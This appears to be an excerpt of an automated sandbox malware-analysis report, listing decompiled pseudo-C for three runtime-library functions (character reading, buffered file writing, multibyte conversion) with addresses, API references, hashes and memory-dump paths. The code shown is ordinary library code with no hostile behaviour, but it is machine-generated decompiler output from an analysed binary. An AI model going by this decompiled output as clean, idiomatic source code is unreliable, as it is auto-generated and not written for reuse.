                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID: invalid string position
                                                                                                                                                                                                        • API String ID: 3355147766-1799206989
                                                                                                                                                                                                        • Opcode ID: 35ab4fa941d0f0b355e05e4954304598f0911735ceef2f24eda3913f4f812397
                                                                                                                                                                                                        • Instruction ID: 2f2ca15ef77ba88ce936d0c0f6117db976c3df226251c88510fed455a64c03ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35ab4fa941d0f0b355e05e4954304598f0911735ceef2f24eda3913f4f812397
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF0307664021CABCB10EAD2D841ACEBB7CEF50365F50403BF640B6596DAB9D940D7A8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004030D4 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E004030D4(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E00406D52(E00417208, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E00401000(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E00406DAB(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E00402330(_t95, _t130 - 0x2c, _t123, _t129, 1, _t54);
								_t58 = E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E004028A7(E0040306F(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E004070AC(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E004028A7(E0040306F(_t106, _t130 - 0x5c));
											E00401720(_t95, _t130 - 0x2c, 1, _t129, 0,  *((intOrPtr*)(_t130 - 0x34)) - E004028A7(E0040306F(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E00406A4A(_t95, _t83, _t130 - 0x2d, 1, E004028A7(E0040306F(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E004011C0(_t130 - 0x2c, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E00402E57(__eflags, _t130 - 0x2d, _t52);
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E00406D9C(_t95, _t123, _t129);
			}










                                                                                                                                                                                                        0x004030d4
                                                                                                                                                                                                        0x004030d4
                                                                                                                                                                                                        0x004030d4
                                                                                                                                                                                                        0x004030d4
                                                                                                                                                                                                        0x004030db
                                                                                                                                                                                                        0x004030e0
                                                                                                                                                                                                        0x004030e9
                                                                                                                                                                                                        0x00403113
                                                                                                                                                                                                        0x00403116
                                                                                                                                                                                                        0x00403118
                                                                                                                                                                                                        0x0040311f
                                                                                                                                                                                                        0x00403123
                                                                                                                                                                                                        0x0040313e
                                                                                                                                                                                                        0x00403143
                                                                                                                                                                                                        0x0040320e
                                                                                                                                                                                                        0x0040320e
                                                                                                                                                                                                        0x00403211
                                                                                                                                                                                                        0x00403217
                                                                                                                                                                                                        0x0040321a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403152
                                                                                                                                                                                                        0x00403165
                                                                                                                                                                                                        0x0040316d
                                                                                                                                                                                                        0x0040317d
                                                                                                                                                                                                        0x00403185
                                                                                                                                                                                                        0x00403187
                                                                                                                                                                                                        0x0040319a
                                                                                                                                                                                                        0x004031a4
                                                                                                                                                                                                        0x004031a7
                                                                                                                                                                                                        0x004031a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004031ab
                                                                                                                                                                                                        0x004031ad
                                                                                                                                                                                                        0x004031ae
                                                                                                                                                                                                        0x004031b0
                                                                                                                                                                                                        0x004031e6
                                                                                                                                                                                                        0x004031e9
                                                                                                                                                                                                        0x004031ec
                                                                                                                                                                                                        0x0040324c
                                                                                                                                                                                                        0x00403263
                                                                                                                                                                                                        0x00403263
                                                                                                                                                                                                        0x00403265
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403253
                                                                                                                                                                                                        0x00403256
                                                                                                                                                                                                        0x00403256
                                                                                                                                                                                                        0x0040325b
                                                                                                                                                                                                        0x0040325c
                                                                                                                                                                                                        0x00403262
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004031ee
                                                                                                                                                                                                        0x00403201
                                                                                                                                                                                                        0x00403209
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403209
                                                                                                                                                                                                        0x004031b2
                                                                                                                                                                                                        0x004031b2
                                                                                                                                                                                                        0x004031b5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004031b7
                                                                                                                                                                                                        0x004031b7
                                                                                                                                                                                                        0x004031ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004031bc
                                                                                                                                                                                                        0x004031d6
                                                                                                                                                                                                        0x00403267
                                                                                                                                                                                                        0x00403267
                                                                                                                                                                                                        0x00403267
                                                                                                                                                                                                        0x004031ba
                                                                                                                                                                                                        0x004031b5
                                                                                                                                                                                                        0x004031b0
                                                                                                                                                                                                        0x00403223
                                                                                                                                                                                                        0x0040322a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040322f
                                                                                                                                                                                                        0x00403220
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403125
                                                                                                                                                                                                        0x0040312a
                                                                                                                                                                                                        0x00403131
                                                                                                                                                                                                        0x00403133
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403135
                                                                                                                                                                                                        0x00403135
                                                                                                                                                                                                        0x00403133
                                                                                                                                                                                                        0x0040311a
                                                                                                                                                                                                        0x0040311a
                                                                                                                                                                                                        0x0040311a
                                                                                                                                                                                                        0x004030fb
                                                                                                                                                                                                        0x004030fe
                                                                                                                                                                                                        0x00403100
                                                                                                                                                                                                        0x00403108
                                                                                                                                                                                                        0x0040310a
                                                                                                                                                                                                        0x0040310d
                                                                                                                                                                                                        0x00403112

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004030DB
                                                                                                                                                                                                        • _fgetc.LIBCMT ref: 00403211
                                                                                                                                                                                                          • Part of subcall function 00402330: std::_String_base::_Xlen.LIBCPMT ref: 0040234A
                                                                                                                                                                                                        • _memcpy_s.LIBCMT ref: 004031D6
                                                                                                                                                                                                        • _ungetc.LIBCMT ref: 0040325C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 9762108-0
                                                                                                                                                                                                        • Opcode ID: f117f6bada6efc273c9a359eb13dd19cdfb91ab3bb1de83bf946f7ac03b1af4b
                                                                                                                                                                                                        • Instruction ID: 9fa00fa45d3d0fe1768d41eb2a58fbeec1902a854fe537b5d35af1df4defd993
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f117f6bada6efc273c9a359eb13dd19cdfb91ab3bb1de83bf946f7ac03b1af4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3515E329042089BCB14EFB9D8419EEBBB9AF48315F10453FE152F72D1DA78EA44CB64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00407402 Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00407402(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040BD80(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040E3B6(_t90, _t98, _t100));
										_t74 = E0040EB64(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040711E(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E004045A0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00409A24(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00404E2D(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                                                                        0x00407402
                                                                                                                                                                                                        0x00407412
                                                                                                                                                                                                        0x00407438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407419
                                                                                                                                                                                                        0x00407419
                                                                                                                                                                                                        0x0040741c
                                                                                                                                                                                                        0x0040741e
                                                                                                                                                                                                        0x0040743f
                                                                                                                                                                                                        0x00407442
                                                                                                                                                                                                        0x00407444
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407446
                                                                                                                                                                                                        0x0040744b
                                                                                                                                                                                                        0x0040744e
                                                                                                                                                                                                        0x00407451
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407456
                                                                                                                                                                                                        0x0040745a
                                                                                                                                                                                                        0x00407461
                                                                                                                                                                                                        0x00407464
                                                                                                                                                                                                        0x00407467
                                                                                                                                                                                                        0x00407469
                                                                                                                                                                                                        0x00407473
                                                                                                                                                                                                        0x0040746b
                                                                                                                                                                                                        0x0040746e
                                                                                                                                                                                                        0x0040746e
                                                                                                                                                                                                        0x0040747a
                                                                                                                                                                                                        0x0040747c
                                                                                                                                                                                                        0x00407541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407482
                                                                                                                                                                                                        0x00407482
                                                                                                                                                                                                        0x00407485
                                                                                                                                                                                                        0x00407485
                                                                                                                                                                                                        0x0040748b
                                                                                                                                                                                                        0x004074bc
                                                                                                                                                                                                        0x004074bc
                                                                                                                                                                                                        0x004074bf
                                                                                                                                                                                                        0x00407518
                                                                                                                                                                                                        0x0040751f
                                                                                                                                                                                                        0x00407522
                                                                                                                                                                                                        0x0040754d
                                                                                                                                                                                                        0x0040754d
                                                                                                                                                                                                        0x0040754f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407553
                                                                                                                                                                                                        0x00407524
                                                                                                                                                                                                        0x00407527
                                                                                                                                                                                                        0x0040752a
                                                                                                                                                                                                        0x0040752b
                                                                                                                                                                                                        0x0040752e
                                                                                                                                                                                                        0x00407530
                                                                                                                                                                                                        0x00407532
                                                                                                                                                                                                        0x00407532
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407530
                                                                                                                                                                                                        0x004074c1
                                                                                                                                                                                                        0x004074c3
                                                                                                                                                                                                        0x004074d0
                                                                                                                                                                                                        0x004074d0
                                                                                                                                                                                                        0x004074d4
                                                                                                                                                                                                        0x004074d6
                                                                                                                                                                                                        0x004074da
                                                                                                                                                                                                        0x004074dc
                                                                                                                                                                                                        0x004074df
                                                                                                                                                                                                        0x004074df
                                                                                                                                                                                                        0x004074df
                                                                                                                                                                                                        0x004074e1
                                                                                                                                                                                                        0x004074e2
                                                                                                                                                                                                        0x004074ec
                                                                                                                                                                                                        0x004074ed
                                                                                                                                                                                                        0x004074f2
                                                                                                                                                                                                        0x004074f5
                                                                                                                                                                                                        0x004074f8
                                                                                                                                                                                                        0x0040755b
                                                                                                                                                                                                        0x0040755b
                                                                                                                                                                                                        0x0040755f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004074fa
                                                                                                                                                                                                        0x004074fa
                                                                                                                                                                                                        0x004074fc
                                                                                                                                                                                                        0x004074fe
                                                                                                                                                                                                        0x00407500
                                                                                                                                                                                                        0x00407500
                                                                                                                                                                                                        0x00407502
                                                                                                                                                                                                        0x00407505
                                                                                                                                                                                                        0x00407507
                                                                                                                                                                                                        0x00407509
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040750b
                                                                                                                                                                                                        0x0040750b
                                                                                                                                                                                                        0x0040750b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040750b
                                                                                                                                                                                                        0x00407509
                                                                                                                                                                                                        0x004074f8
                                                                                                                                                                                                        0x004074c6
                                                                                                                                                                                                        0x004074cc
                                                                                                                                                                                                        0x004074ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004074ce
                                                                                                                                                                                                        0x0040748d
                                                                                                                                                                                                        0x00407490
                                                                                                                                                                                                        0x00407492
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407494
                                                                                                                                                                                                        0x00407549
                                                                                                                                                                                                        0x00407549
                                                                                                                                                                                                        0x00407549
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407549
                                                                                                                                                                                                        0x0040749a
                                                                                                                                                                                                        0x0040749c
                                                                                                                                                                                                        0x0040749e
                                                                                                                                                                                                        0x004074a0
                                                                                                                                                                                                        0x004074a0
                                                                                                                                                                                                        0x004074a8
                                                                                                                                                                                                        0x004074ad
                                                                                                                                                                                                        0x004074b0
                                                                                                                                                                                                        0x004074b2
                                                                                                                                                                                                        0x004074b5
                                                                                                                                                                                                        0x004074b7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407539
                                                                                                                                                                                                        0x00407539
                                                                                                                                                                                                        0x00407539
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407482
                                                                                                                                                                                                        0x0040747c
                                                                                                                                                                                                        0x00407420
                                                                                                                                                                                                        0x00407420
                                                                                                                                                                                                        0x00407425
                                                                                                                                                                                                        0x00407426
                                                                                                                                                                                                        0x00407427
                                                                                                                                                                                                        0x00407428
                                                                                                                                                                                                        0x00407429
                                                                                                                                                                                                        0x0040742a
                                                                                                                                                                                                        0x00407430
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00407435

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __flush.LIBCMT ref: 004074C6
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 004074E6
                                                                                                                                                                                                        • __locking.LIBCMT ref: 004074ED
                                                                                                                                                                                                        • __flsbuf.LIBCMT ref: 00407518
                                                                                                                                                                                                          • Part of subcall function 00409A24: __getptd_noexit.LIBCMT ref: 00409A24
                                                                                                                                                                                                          • Part of subcall function 00404E2D: __decode_pointer.LIBCMT ref: 00404E38
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                                                        • Opcode ID: dc29f09d118e550aacc3eb764c57d9025dc60e0096fa27560fbf8e4d25ed3698
                                                                                                                                                                                                        • Instruction ID: 719244e9d59235a0eaa91a05f0ae5385ab93f0e5e9c00e77f3c3a17d24c4edef
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc29f09d118e550aacc3eb764c57d9025dc60e0096fa27560fbf8e4d25ed3698
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D341E571E04604EBCB248F69888059FBBB5AF80324F24853EE455A76C0D778FD418B5A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004144CE Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E004144CE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00409E7B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00412C90( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00409A24(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                                                        0x004144d8
                                                                                                                                                                                                        0x004144df
                                                                                                                                                                                                        0x004144f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004144e6
                                                                                                                                                                                                        0x004144e8
                                                                                                                                                                                                        0x00414502
                                                                                                                                                                                                        0x00414507
                                                                                                                                                                                                        0x0041450a
                                                                                                                                                                                                        0x0041450d
                                                                                                                                                                                                        0x00414536
                                                                                                                                                                                                        0x0041453d
                                                                                                                                                                                                        0x0041453f
                                                                                                                                                                                                        0x004145c0
                                                                                                                                                                                                        0x004145db
                                                                                                                                                                                                        0x004145dd
                                                                                                                                                                                                        0x0041451d
                                                                                                                                                                                                        0x0041451d
                                                                                                                                                                                                        0x00414520
                                                                                                                                                                                                        0x00414522
                                                                                                                                                                                                        0x00414525
                                                                                                                                                                                                        0x00414525
                                                                                                                                                                                                        0x00414525
                                                                                                                                                                                                        0x00414525
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041452b
                                                                                                                                                                                                        0x0041459f
                                                                                                                                                                                                        0x0041459f
                                                                                                                                                                                                        0x004145a4
                                                                                                                                                                                                        0x004145aa
                                                                                                                                                                                                        0x004145ad
                                                                                                                                                                                                        0x004145af
                                                                                                                                                                                                        0x004145b2
                                                                                                                                                                                                        0x004145b2
                                                                                                                                                                                                        0x004145b2
                                                                                                                                                                                                        0x004145b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004145b6
                                                                                                                                                                                                        0x00414541
                                                                                                                                                                                                        0x00414544
                                                                                                                                                                                                        0x0041454a
                                                                                                                                                                                                        0x0041454d
                                                                                                                                                                                                        0x00414574
                                                                                                                                                                                                        0x00414577
                                                                                                                                                                                                        0x0041457d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041457f
                                                                                                                                                                                                        0x00414582
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00414584
                                                                                                                                                                                                        0x00414584
                                                                                                                                                                                                        0x0041458a
                                                                                                                                                                                                        0x0041458d
                                                                                                                                                                                                        0x004144fb
                                                                                                                                                                                                        0x004144fb
                                                                                                                                                                                                        0x00414596
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00414596
                                                                                                                                                                                                        0x0041454f
                                                                                                                                                                                                        0x00414552
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00414556
                                                                                                                                                                                                        0x00414567
                                                                                                                                                                                                        0x0041456d
                                                                                                                                                                                                        0x0041456f
                                                                                                                                                                                                        0x00414572
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00414572
                                                                                                                                                                                                        0x0041450f
                                                                                                                                                                                                        0x00414512
                                                                                                                                                                                                        0x00414514
                                                                                                                                                                                                        0x0041451a
                                                                                                                                                                                                        0x0041451a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004144ea
                                                                                                                                                                                                        0x004144ea
                                                                                                                                                                                                        0x004144ef
                                                                                                                                                                                                        0x004144f3
                                                                                                                                                                                                        0x004144f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004144ef
                                                                                                                                                                                                        0x004144e8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414502
                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00414536
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,0040BF91,?,00000000,00000000,?,?,?,?,0040BF91,00000000,?), ref: 00414567
